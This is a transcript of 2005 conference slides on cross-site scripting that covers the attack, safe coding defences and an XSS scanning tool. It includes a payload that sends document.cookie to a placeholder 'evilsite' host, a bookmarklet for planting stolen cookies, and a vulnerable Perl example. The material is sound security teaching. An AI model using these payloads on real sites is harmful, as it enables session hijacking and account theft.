Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site...
Transcript of Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site...
![Page 1: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/1.jpg)
Cross Site Scripting Scanning
Sven Neuhaus
What The Hack 2005
V3 © 2005 Sven Neuhaus
![Page 2: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/2.jpg)
Outline
● Introduction to Cross Site
Scripting (XSS)● Safe coding practices● Scanning for vulnerabilities
![Page 3: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/3.jpg)
Introduction to XSS
The Problem:User-supplied data gets inserted into
dynamic web pages
![Page 4: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/4.jpg)
Introduction to XSS
The Problem:User-supplied data gets inserted into
dynamic web pages and executed as
code by browsers!
![Page 5: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/5.jpg)
Where does the data come from?
● Form input● URLs (paths and parameters)● HTTP_REFERER● log files● cookies● DNS● databases
![Page 6: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/6.jpg)
Dangerous data
● Code in web pages:– JavaScript aka JScript, ECMAScript– VBScript
● Exploits for browser security holes: – Buffer overruns, – Java sandbox holes, – ActiveX components marked as “safe”.
● Executed by the server– PHP
![Page 7: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/7.jpg)
The JavaScript security model
JavaScript code may● access current window and child
windows and frames● read and write cookies● load data from URLs
![Page 8: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/8.jpg)
Cookies
Cookies are used to store user sessions.
They have these attributes:● domain● path● secure● expiration date● name/value
JavaScript can steal cookies!
![Page 9: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/9.jpg)
Session hijacking step by step
1) create exploit URL or page
<script>new Image().src=
"http://evilsite/?data="+encodeURI(document.cookie)
</script>
![Page 10: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/10.jpg)
Session hijacking step by step
1) create exploit URL or page
2) send it to the victim
3) victim visits URL
4) code gets inserted by server
5) victim’s browser executes code
6) code steals victim’s session cookie
7) attacker steals session
![Page 11: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/11.jpg)
Live demonstration
![Page 12: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/12.jpg)
Bookmarklet for cookie thieves
javascript:var cd=prompt( 'Cookie data?').replace( /\\/g,'').split(';');while(i
=cd.shift())document.cookie=i;void alert("cookies:\n"+
document.cookie);
![Page 13: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/13.jpg)
XSS: Defacements & social engineering
Inserted code has complete control
over the web page:
Delete, create and alter
texts, images and links.
Example: eBay auctions
![Page 14: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/14.jpg)
User protection
Disable JavaScript in Mozilla for
notorious sites:In ~/.firefox/default/xyz.slt/user.js:
user_pref("capability.policy.policynames",
"nojs");
user_pref("capability.policy.nojs.sites",
"ebay.de ebay.com ebay.nl ebay.co.uk");
user_pref("capability.policy.nojs.javascri
pt.enabled", "noAccess");
![Page 15: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/15.jpg)
XSS example code
Vulnerable example perl script from the CGI.pm
documentation (shortened)
use CGI qw/:standard/;print header, start_form,
"What’s your name?",textfield(’name’), submit, end_form;
print "Your name is",em(param(’name’))if param();
![Page 16: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/16.jpg)
Safe Coding Practices
XSS relies on insertion of
control chars.
HTML: <, >, " and '
URLs: ?, & and =SQL, Shell, PHP, SHTML have their own
![Page 17: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/17.jpg)
Proper filtering
● Don't filter certain dangerous characters
● Instead, allow only characters deemed necessary!
● Sanitize data in one central location
● If control chars are allowed, escape them
![Page 18: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/18.jpg)
Perl
Use perl's unique taint mode:
#!/usr/bin/perl -wT
/^([a-z0-9.-]*)$/ ordie "\$_ is naughty!\n";
$_ = $1; # $_ is now untainted
![Page 19: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/19.jpg)
Taint Mode with Perl modules
For DBI, use TaintIn:$dbh = DBI->connect($dsn, $user,
$pw, { TaintIn => 1 });
print() is considered safe!
Use Apache::TaintRequest for
fully automatic HTML entity escaping of tainted
data:
<&><&> <"><">
![Page 20: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/20.jpg)
PHP
XSS related functionsstring strip_tags ( string str [,
string allowable_tags] )
string htmlentities ( string string [, int quote_style [, string charset]] )
string urlencode ( string str )
"=" "%3D"
![Page 21: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/21.jpg)
Stopping Cookie Theft
●Store IP address in session - but
beware of AOL proxy clusters!●Limit cookie path●Limit lifespan of session-id
![Page 22: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/22.jpg)
Cross Site Scripting Scanning
![Page 23: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/23.jpg)
XSSS mode of operation
● Crawl website● Detect forms and URLs with
parameters● Fill in forms, alter parameters to
include control characters● Scan web server response for our
input
![Page 24: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/24.jpg)
XSSS Live demonstration
![Page 25: Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities](https://reader030.fdocuments.us/reader030/viewer/2022040907/5e7cd2c90b95a97bc2356e42/html5/thumbnails/25.jpg)
Q&A
XSS/XSSS Resources
XSSS Download and XSS Link list at:http://www.sven.de/xsss/
Contact address:
Sven Neuhaus <[email protected]>
© 2005 Sven Neuhaus